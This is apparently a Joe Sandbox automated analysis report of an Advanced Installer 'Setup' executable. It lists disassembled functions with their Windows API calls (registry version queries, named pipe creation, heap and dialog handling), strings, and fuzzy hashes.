Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Find$AllocateCloseFileFirstHeap
String ID: &_'
API String ID: 1673784098-2411122644
Opcode ID: 9009bbca4d71d982e019e1913635df9ecb8fdbb43cbb0f9bda1bbb080e76c8a5
Instruction ID: fb4027ff459542b60ac9591111bd1820f6bcaf16eb2a8961102303d6d08042be
Opcode Fuzzy Hash: 9009bbca4d71d982e019e1913635df9ecb8fdbb43cbb0f9bda1bbb080e76c8a5
Instruction Fuzzy Hash: EA31B07190461CDBDB24DF59DC49B5AB7B8FF44324F204299E919E7380D7719D44CB81

Function 00724C80 Relevance: 6.8, Strings: 5, Instructions: 544COMMON

Download Yara Rule

Strings

x64, xrefs: 00725188
Arm64, xrefs: 00725214
Intel, xrefs: 007251D1
Intel64, xrefs: 00725134
&_', xrefs: 00724C96, 00724F24

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID:
String ID: Arm64$Intel$Intel64$x64$&_'
API String ID: 0-3964276909
Opcode ID: 720544b93727fac003e4b9743fbab36f837d20d310b9839c72e8e406f8244c76
Instruction ID: 49c384c804c843af9acd4ade1aa6006a9b879b48bc13fb674a33d1c95e1b04e2
Opcode Fuzzy Hash: 720544b93727fac003e4b9743fbab36f837d20d310b9839c72e8e406f8244c76
Instruction Fuzzy Hash: 4C129DB1E00669DFDB24CFA8D954BBEBBF1FF54304F548219E451AB280D778AA44CB90

Function 00889930 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92filepipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeW.KERNEL32(?,00000003,00000006,000000FF,00007F90,00007F90,00001388,00000000,?,00000000,275F26E1,?,?,00000000), ref: 008899BB
CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,00000000,00000000,?,00000000,275F26E1,?,?,00000000), ref: 008899E1

Strings

&_', xrefs: 00889947

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Create$FileNamedPipe
String ID: &_'
API String ID: 1328467360-2411122644
Opcode ID: 9717fa547775ed916d35be29447af617bde32bd5ef404f0372692393779c61be
Instruction ID: 0560c34f9aecb893c4ecbadeb1f8c47a94d00ac1153237ed692d9831fd712044
Opcode Fuzzy Hash: 9717fa547775ed916d35be29447af617bde32bd5ef404f0372692393779c61be
Instruction Fuzzy Hash: 01310431A48706AFDB20DF68DC01BA9FBA4FB01720F14865EF966A73D0CB71A900CB54

Function 00911069 Relevance: 5.0, APIs: 4, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000008,00000000,00872C81,?,?,?), ref: 0091106E
HeapAlloc.KERNEL32(00000000,?,?,?), ref: 00911075
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 009110BB
HeapFree.KERNEL32(00000000,?,?,?), ref: 009110C2

Part of subcall function 00910F07: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,009110B1,?,?,?,?), ref: 00910F2B
Part of subcall function 00910F07: HeapAlloc.KERNEL32(00000000,?,?,?,?), ref: 00910F32

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Heap$Process$Alloc$Free
String ID:
API String ID: 1864747095-0
Opcode ID: fbfa7db2d08799302a89b536d4eb3ffebdf197208fab323e647eda4285928536
Instruction ID: 751ae1753a56c7897003ca38cf294473ef455d9093ae870b246a3c2deafe15bf
Opcode Fuzzy Hash: fbfa7db2d08799302a89b536d4eb3ffebdf197208fab323e647eda4285928536
Instruction Fuzzy Hash: DCF0BB73F5C725A7C73427F87C09A9B6969AFC67617024819F546C6144DE30C8C167E0

Function 00894D10 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 54comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(009D2FB8,00000000,00000001,009F3134,000000B0), ref: 00894D97

Strings

&_', xrefs: 00894D25

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CreateInstance
String ID: &_'
API String ID: 542301482-2411122644
Opcode ID: 5674b34a6337a03d44db1f9a909b410720ab2dd39f35568f608c32547624de7a
Instruction ID: 0b8276cf64fd0b4962198c6f8b5c92830c8404c7a4c55d6677b965b32dc24112
Opcode Fuzzy Hash: 5674b34a6337a03d44db1f9a909b410720ab2dd39f35568f608c32547624de7a
Instruction Fuzzy Hash: E4117CB5604708AFDB14CF49DC45B5AFBF8FB45728F14425AE8149B7C0C7B56905CB90

Function 00724480 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

__set_se_translator.LIBVCRUNTIME ref: 00724498
SetUnhandledExceptionFilter.KERNEL32(00842C50), ref: 007244AE

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ExceptionFilterUnhandled__set_se_translator
String ID:
API String ID: 2480343447-0
Opcode ID: 22f36b053147613ead3a3ca678a6dc42e2792e63e26b765f6406e3d62f8162b0
Instruction ID: dacd7a1d5e2723e743e8e7afe21ea7f35a6b4393f878072e8d979d318f4367f6
Opcode Fuzzy Hash: 22f36b053147613ead3a3ca678a6dc42e2792e63e26b765f6406e3d62f8162b0
Instruction Fuzzy Hash: 3CE0D835B1C2547BCB00A7E4EC49F4ABF64EFE6711F054019F60593260C6B4498697E1

Function 00890610 Relevance: 1.4, Strings: 1, Instructions: 179COMMON

Download Yara Rule

Strings

&_', xrefs: 00890627

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: CreateHeapInstanceProcess
String ID: &_'
API String ID: 776714826-2411122644
Opcode ID: 0cfb59a648db98ab51ff10423da13fc2b8678ddf065cb2774dddc1493478ea41
Instruction ID: ace3344abc6b6021c1ddeae2fd999603b85d5bac14192be147100047d6c4d56c
Opcode Fuzzy Hash: 0cfb59a648db98ab51ff10423da13fc2b8678ddf065cb2774dddc1493478ea41
Instruction Fuzzy Hash: 5E7138B1A0074AEFDB05DF69C49878ABBE0FF05318F148169D5189B741DBB5AA19CFC0

Function 0084A580 Relevance: 42.2, APIs: 4, Strings: 20, Instructions: 223
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000002,SYSTEM\CurrentControlSet\Control\ProductOptions,00000000,00020119,00000000), ref: 0084A5FA
RegQueryValueExW.KERNEL32(00000000,ProductType,00000000,00000000,?,?), ref: 0084A62F
RegQueryValueExW.KERNEL32(00000000,ProductSuite,00000000,00000000,?,?), ref: 0084A6AE
RegCloseKey.KERNEL32(00000000), ref: 0084A88E

Strings

Small Business, xrefs: 0084A6F0
Blade, xrefs: 0084A7D0
ProductSuite, xrefs: 0084A6A3
Storage Server, xrefs: 0084A815
CommunicationServer, xrefs: 0084A73B
EmbeddedNT, xrefs: 0084A786
SYSTEM\CurrentControlSet\Control\ProductOptions, xrefs: 0084A5F0
Compute Server, xrefs: 0084A82C
ProductType, xrefs: 0084A624
&_', xrefs: 0084A597
ServerNT, xrefs: 0084A65C
BackOffice, xrefs: 0084A722
DataCenter, xrefs: 0084A79F
Terminal Server, xrefs: 0084A754
WinNT, xrefs: 0084A639
Enterprise, xrefs: 0084A709
Security Appliance, xrefs: 0084A7FE
Embedded(Restricted), xrefs: 0084A7E7
Personal, xrefs: 0084A7B9
Small Business(Restricted), xrefs: 0084A76D

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: QueryValue$CloseOpen
String ID: BackOffice$Blade$CommunicationServer$Compute Server$DataCenter$Embedded(Restricted)$EmbeddedNT$Enterprise$Personal$ProductSuite$ProductType$SYSTEM\CurrentControlSet\Control\ProductOptions$Security Appliance$ServerNT$Small Business$Small Business(Restricted)$Storage Server$Terminal Server$WinNT$&_'
API String ID: 1586453840-314023965
Opcode ID: e20b65d70ddc0bb355e7b781416539797159c80d476dad19083b26d95327373b
Instruction ID: 4c04fb1417bf93e29f3d98aabb2896fdd09e85a53d35add52fd0283c90d6e749
Opcode Fuzzy Hash: e20b65d70ddc0bb355e7b781416539797159c80d476dad19083b26d95327373b
Instruction Fuzzy Hash: E471C63478035C8BEB299B25CD407AA76A9FB50708F1044B5D916EF782FA78CD468743

Function 0084A1D0 Relevance: 37.0, APIs: 11, Strings: 10, Instructions: 227
registrylibraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNEL32(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,00020119,00000000), ref: 0084A248
RegQueryValueExW.KERNEL32(00000000,CurrentMajorVersionNumber,00000000,00000000,?,?), ref: 0084A289
RegQueryValueExW.KERNEL32(00000000,CurrentMinorVersionNumber,00000000,00000000,?,00000004), ref: 0084A2AC
RegQueryValueExW.ADVAPI32(00000000,CurrentVersion,00000000,00000000,?,?), ref: 0084A2DF
RegQueryValueExW.KERNEL32(00000000,CurrentBuildNumber,00000000,00000000,?,?), ref: 0084A358
RegQueryValueExW.KERNEL32(00000000,ReleaseId,00000000,00000000,?,?), ref: 0084A3CF
RegQueryValueExW.KERNEL32(00000000,CSDVersion,00000000,00000000,?,?), ref: 0084A425
GetModuleHandleW.KERNEL32(kernel32,IsWow64Process), ref: 0084A4C3
GetProcAddress.KERNEL32(00000000), ref: 0084A4CA
GetCurrentProcess.KERNEL32(?), ref: 0084A501
RegCloseKey.ADVAPI32(00000000), ref: 0084A54A

Strings

CurrentMajorVersionNumber, xrefs: 0084A27E
kernel32, xrefs: 0084A4BE
Software\Microsoft\Windows NT\CurrentVersion, xrefs: 0084A23E
IsWow64Process, xrefs: 0084A4B9
CurrentMinorVersionNumber, xrefs: 0084A2A1
CurrentVersion, xrefs: 0084A2D4
CSDVersion, xrefs: 0084A41A
&_', xrefs: 0084A1E7
CurrentBuildNumber, xrefs: 0084A34D
ReleaseId, xrefs: 0084A3C4

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: QueryValue$AddressCloseCurrentHandleModuleOpenProcProcess
String ID: CSDVersion$CurrentBuildNumber$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$IsWow64Process$ReleaseId$Software\Microsoft\Windows NT\CurrentVersion$kernel32$&_'
API String ID: 3667490055-1739861957
Opcode ID: 077c831fbbd5a315a8d8804b928984a67a74e88bd37d16ae3c44f57e4f69688f
Instruction ID: aa5cb382212d5ee9e8b499a21fe8aaea7f703b7266b79443f72460c7be928fb2
Opcode Fuzzy Hash: 077c831fbbd5a315a8d8804b928984a67a74e88bd37d16ae3c44f57e4f69688f
Instruction Fuzzy Hash: 30A1DFB59403289FEB20CF60DC49BA9B7B5FB44715F0001E9E409EB290EB769E95CF41

Function 00861C70 Relevance: 27.4, APIs: 10, Strings: 5, Instructions: 1160threadCOMMON

Download Yara Rule

APIs

GetActiveWindow.USER32 ref: 00861E84
SetLastError.KERNEL32(0000000E), ref: 00861EA1
GetCurrentThreadId.KERNEL32 ref: 00861EB9
EnterCriticalSection.KERNEL32(00A6D6DC), ref: 00861ED6
LeaveCriticalSection.KERNEL32(00A6D6DC), ref: 00861EF9
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000010), ref: 00862106
SetEvent.KERNEL32(?,?,00000000,?,00000001,?,?), ref: 00862393

Part of subcall function 00889A40: CloseHandle.KERNEL32(?,275F26E1,?,00000010,?,00000000,00992F13,000000FF,?,0086662C,00000000,00000000,00000000,00000001,?,0000000D), ref: 00889A7A

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 0086213A

Part of subcall function 006EA7A0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,?,0088A498,\\.\pipe\ToServer,?,00000000,?,?,00941D06,000000FF,?,00889991), ref: 006EA7C3

Part of subcall function 0082B5C0: MultiByteToWideChar.KERNEL32(00000003,00000000,0086E395,000000FF,00000000,00000000,00000000,?,?,0086E395,009D5C9A), ref: 0082B5D8
Part of subcall function 0082B5C0: MultiByteToWideChar.KERNEL32(00000003,00000000,0086E395,000000FF,?,-00000001,?,0086E395,009D5C9A), ref: 0082B60A

DialogBoxParamW.USER32(000007D0,00000000,0077A3A0,00000000), ref: 00861F16

Part of subcall function 006EAF70: RtlAllocateHeap.NTDLL(?,00000000,?,275F26E1,00000000,0093C660,000000FF,?,?,00A5D9BC,?,00000000,0088F88B,8000000B,275F26E1), ref: 006EAFBA

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

Strings

Code returned to Windows by setup:, xrefs: 00862BC7
&_', xrefs: 00862B7D, 00862C18
Advinst_Extract_, xrefs: 0086209D, 008620B2, 008620BC
&_', xrefs: 00861C87, 00862037, 00862B75
FILES.7z, xrefs: 0086268F

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ByteCharMultiWide$CriticalHeapSection$ActiveAllocateCloseCurrentDialogEnterErrorEventFindHandleLastLeaveParamProcessResourceThreadWindow
String ID: Advinst_Extract_$Code returned to Windows by setup:$FILES.7z$&_'$&_'
API String ID: 1122345507-2203472149
Opcode ID: ecca4821a1f7b00ebbdbe5947c2f30eb5deb035181ce0b3a7c81769b72c12c0b
Instruction ID: 347da05b9a7c27139cf0e1ff002e0086683a9e030000a9622c9efb37491296e5
Opcode Fuzzy Hash: ecca4821a1f7b00ebbdbe5947c2f30eb5deb035181ce0b3a7c81769b72c12c0b
Instruction Fuzzy Hash: BFA2CA30A006488FDB14DBA8CC59BEEBBB5FF49320F194199E415A7392DB74AE41CF91

Function 00862020 Relevance: 24.9, APIs: 3, Strings: 11, Instructions: 378
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000010), ref: 00862106
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 0086213A

Part of subcall function 006EA7A0: FindResourceW.KERNEL32(00000000,?,00000006,00000000,?,?,0088A498,\\.\pipe\ToServer,?,00000000,?,?,00941D06,000000FF,?,00889991), ref: 006EA7C3

Strings

A valid language was received from commnad line. This is:, xrefs: 00862DE0
Language of a related product is:, xrefs: 00863040
Code returned to Windows by setup:, xrefs: 00862BC7
Language used for UI:, xrefs: 00863101
&_', xrefs: 00862B7D, 00862C18
Language selected programatically for UI:, xrefs: 00863211
&_', xrefs: 00861C87, 00862037, 00862B75
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\, xrefs: 00862FC4
Advinst_Extract_, xrefs: 0086209D, 008620B2, 008620BC
Software\Caphyon\Advanced Installer\, xrefs: 00862FB0
%hu, xrefs: 00862E1A

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: ByteCharMultiWide$FindHeapProcessResource
String ID: %hu$A valid language was received from commnad line. This is:$Advinst_Extract_$Code returned to Windows by setup:$Language of a related product is:$Language selected programatically for UI:$Language used for UI:$SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\$Software\Caphyon\Advanced Installer\$&_'$&_'
API String ID: 2083075878-2602414886
Opcode ID: 31cd954c115ec6647338b01a8d738352c7b9950579cda80e1ed879e8c5f5185c
Instruction ID: 408b36304a1a40b74b84579420a2edb2739aff5d3eeb8ccd4658f6c30784b04e
Opcode Fuzzy Hash: 31cd954c115ec6647338b01a8d738352c7b9950579cda80e1ed879e8c5f5185c
Instruction Fuzzy Hash: D4E1FC31A056589FCB10DB68CC15BAEBBB5FF89320F154299E819A73D1DB30AE41CF91

Function 00889330 Relevance: 23.1, APIs: 10, Strings: 3, Instructions: 375
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006EB300: GetProcessHeap.KERNEL32 ref: 006EB355

SetWindowTextW.USER32(00000000,?), ref: 008895A2
GetDlgItem.USER32(00000000,000007D1), ref: 008895B9
SendMessageW.USER32(00000000,000000D2,00000000,00000000), ref: 008895CB
GetDlgItem.USER32(00000000,000007D1), ref: 00889614
GetDlgItem.USER32(00000000,0000042D), ref: 00889624
SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00889634
SendMessageW.USER32(00000000,000000CC,?,00000000), ref: 00889650
EndDialog.USER32(00000000,00000002), ref: 0088967D
GetDlgItem.USER32(00000000,000007D1), ref: 008896AF
EndDialog.USER32(00000000,00000001), ref: 0088973C

Part of subcall function 006EAF70: RtlAllocateHeap.NTDLL(?,00000000,?,275F26E1,00000000,0093C660,000000FF,?,?,00A5D9BC,?,00000000,0088F88B,8000000B,275F26E1), ref: 006EAFBA

Part of subcall function 00889790: IsWindow.USER32(00000000), ref: 008897CD
Part of subcall function 00889790: EndDialog.USER32(00000000,00000001), ref: 008897DC

Strings

&_', xrefs: 0088957F
PackageCode, xrefs: 0088945A
&_', xrefs: 00889347

Memory Dump Source

Source File: 00000000.00000002.2180756750.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true

Associated: 00000000.00000002.2180735790.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181005236.00000000009A7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181119562.0000000000A63000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181140004.0000000000A65000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181160168.0000000000A66000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A71000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2181182952.0000000000A73000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e0000_Setup.jbxd

Similarity

API ID: Item$DialogMessageSend$HeapWindow$AllocateProcessText
String ID: PackageCode$&_'$&_'
API String ID: 3798135787-674451718
Opcode ID: 5561a63ca018a4b6644277c01fd230bae29af4f21280ad5e35b7f675d19225b3
Instruction ID: c44170a5a52efb5a0d6f0772b27b6ca74f5a7bdd96c50ef55392c7a02853c42a
Opcode Fuzzy Hash: 5561a63ca018a4b6644277c01fd230bae29af4f21280ad5e35b7f675d19225b3
Instruction Fuzzy Hash: 4CC1EE31600606AFDB04EFA8CC49BAEB7A5FF44310F184129F95AE76E1DB70AD41CB90

Function 00872C10 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 190
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetActiveWindow.USER32 ref: 00872C4D
SetLastError.KERNEL32(0000000E,?,?,?), ref: 00872C8A
GetCurrentThreadId.KERNEL32 ref: 00872D15
SetWindowTextW.USER32(?,00000000), ref: 00872DA4
GetDlgItem.USER32(?,000003E9), ref: 00872DB2
SetWindowTextW.USER32(00000000,?), ref: 00872DBE

Part of subcall function 00868ED0: GetDlgItem.USER32(?,00000002), ref: 00868EED
Part of subcall function 00868ED0: GetWindowRect.USER32(00000000,?), ref: 00868F03
Part of subcall function 00868ED0: ShowWindow.USER32(00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00872C6D), ref: 00868F18
Part of subcall function 00868ED0: InvalidateRect.USER32(00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,?,?,00872C6D), ref: 00868F23
Part of subcall function 00868ED0: GetDlgItem.USER32(?,000003E9), ref: 00868F31
Part of subcall function 00868ED0: GetWindowRect.USER32(00000000,?), ref: 00868F47
Part of subcall function 00868ED0: SetWindowPos.USER32(00000000,00000000,?,?,?,?,00000206,?,00000000), ref: 00868F86

GetDlgItem.USER32(?,00000002), ref: 00872E4E
SetWindowTextW.USER32(00000000,00000000), ref: 00872E56

Part of subcall function 006FBF90: RaiseException.KERNEL32(C0000005,C0000005,00000000,00000000,00872E6A,C0000005,00000001,?,00000000,00000000,?,?,?), ref: 006FBF9C

